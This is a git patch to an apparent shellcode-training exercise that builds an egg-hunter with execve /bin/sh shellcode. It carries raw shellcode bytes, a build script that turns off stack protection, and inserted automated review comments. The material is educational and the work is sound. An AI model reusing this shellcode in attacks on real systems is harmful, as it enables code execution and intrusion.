From 7a26aee78477e0d7b5e95acbe963b8ec78b96844 Mon Sep 17 00:00:00 2001
From: arno01
Date: Wed, 27 Mar 2013 16:47:23 +0100
Subject: [PATCH] minor updates
---
 exam3/USAGE | 16 +++++++---------
 exam3/egg.nasm | 32 --------------------------------
 exam3/make.sh | 14 ++++----------
 exam3/shellcode.c | 2 +-
 4 files changed, 12 insertions(+), 52 deletions(-)
 delete mode 100644 exam3/egg.nasm
diff --git a/exam3/USAGE b/exam3/USAGE
index e78563b..54d3692 100644
--- a/exam3/USAGE
+++ b/exam3/USAGE
@@ -9,25 +9,23 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm
 2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
-exam3$ ./make.sh "cust.egg"
- [I] Using custom EGG mark: cust.egg
+exam3$ ./make.sh
+ [I] Argument not specified. Using default EGG mark.
  [+] Compiling payload.nasm ...
- [+] Compiling egg.nasm ...
  [+] Compiling hunter.nasm ...
- [+] Extracting EGG code from egg ...
  [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
  [+] Checking PAYLOAD code for NULLs ...
  [+] Extracting HUNTER code from hunter ...
  [+] Checking HUNTER code for NULLs ...
  [+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5108 Mar 27 15:00 ./shellcode
+-rwx------. 1 arno arno 5100 Mar 27 16:46 ./shellcode
  [+] All done!
-
 3. Run the shellcode
 exam3$ ./shellcode
-Hunter Length: 37
-Payload Length: 43
-sh-4.1$
+Hunter Length: 29
+Payload Length: 36
+sh-4.1$ exit
diff --git a/exam3/egg.nasm b/exam3/egg.nasm
deleted file mode 100644
index 1de4fa9..0000000
--- a/exam3/egg.nasm
+++ /dev/null
@@ -1,32 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: egg.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-;
-
-section .text
-global _start
-
-_start:
- ;db "Egg-Mark" ; QWORD egg marker - will be appended in shellcode.c after running 'make.sh'
- ; loop counter = 8
- xor ecx, ecx
- mov cl, 8
-decloop:
- dec eax
- loop decloop
diff --git a/exam3/make.sh b/exam3/make.sh
index 96d7355..00c5f73 100755
--- a/exam3/make.sh
+++ b/exam3/make.sh
@@ -32,27 +32,21 @@ NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
 EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
 # Cleanup
-rm -f shellcode payload.o payload egg.o egg hunter.o hunter
+rm -f shellcode payload.o payload hunter.o hunter
 echo " [+] Compiling payload.nasm ..."
 nasm -f elf32 -o payload.o payload.nasm
 ld -m elf_i386 -o payload payload.o
-echo " [+] Compiling egg.nasm ..."
-nasm -f elf32 -o egg.o egg.nasm
-ld -m elf_i386 -o egg egg.o
-
 echo " [+] Compiling hunter.nasm ..."
 nasm -f elf32 -o hunter.o hunter.nasm
 ld -m elf_i386 -o hunter hunter.o
-echo " [+] Extracting EGG code from egg ..."
-EGGCODE=$(objdump -d ./egg |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
-
 echo " [+] Extracting PAYLOAD code from payload ..."
 PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
-FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${EGGCODE}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
 echo " [+] Checking PAYLOAD code for NULLs ..."
 if [[ $FULL_PAYLOADCODE == *00* ]]; then
@@ -129,7 +123,7 @@ echo " [+] Compiling shellcode.c ..."
 gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
 # Cleanup
-rm -f payload.o payload egg.o egg hunter.o hunter
+rm -f payload.o payload hunter.o hunter
 ls -la ./shellcode
diff --git a/exam3/shellcode.c b/exam3/shellcode.c
index 376ae30..3a66c9f 100644
--- a/exam3/shellcode.c
+++ b/exam3/shellcode.c
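Review bot: The new `FULL_PAYLOADCODE=` line hands `${EGGMARK}${PAYLOADCODE}` to `echo -n` unquoted, and `EGGMARK` comes from the `od -A n -t x1` context line above, which starts a new output line every 16 input bytes and whose embedded newline is not touched by the `s/ /\\x/g` rewrite; an egg argument longer than 16 bytes would therefore be word-split and its newline turned into a literal space inside the generated C string, which the `*00*` NULL check a few lines down does not catch. USAGE in this same commit states the egg must be exactly 8 bytes, so unless that length is already enforced above the hunk (not visible here), checking it next to this assignment is cheap: `[[ ${#ARG1} -eq 8 ]] || { echo " [E] EGG mark must be 8 bytes"; exit 1; }` before the line, and `FULL_PAYLOADCODE=$(printf '"%s"' "${EGGMARK}${PAYLOADCODE}")` for the assignment itself, which also drops the two `sed` calls. The second hunk's shortened `rm -f` cleanup needs nothing further.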
@@ -5,7 +5,7 @@ unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x45\x67\x67\x2d\x75\xf6\x
 unsigned char garbage1[] = "Just some garbage here...";
-unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc9\xb1\x08\x48\xe2\xfd\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
 unsigned char garbage2[] = "And some garbage there...";
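Review bot: The replaced `payload[]` initializer is an undocumented run of 36 escaped bytes whose first eight (`\x45\x67\x67\x2d\x4d\x61\x72\x6b`, the "Egg-Mark" text the deleted egg.nasm described) now sit directly in front of the code bytes, yet nothing in the file says the array is produced by make.sh or that the mark is part of it. Since make.sh in this commit appears to regenerate this string (its "[+] Adding EGG mark to PAYLOAD" step runs right before "[+] Compiling shellcode.c"), a comment above the array such as `/* Generated by make.sh: 8-byte egg mark followed by the payload bytes; do not edit by hand. */` would keep the next reader from hand-patching a value the script overwrites. The string-literal initializer also appends a terminating NUL, so `sizeof payload` is 37 while USAGE reports "Payload Length: 36"; the length print lives outside this hunk, so a one-line comment on the array stating which count is authoritative would avoid the confusion.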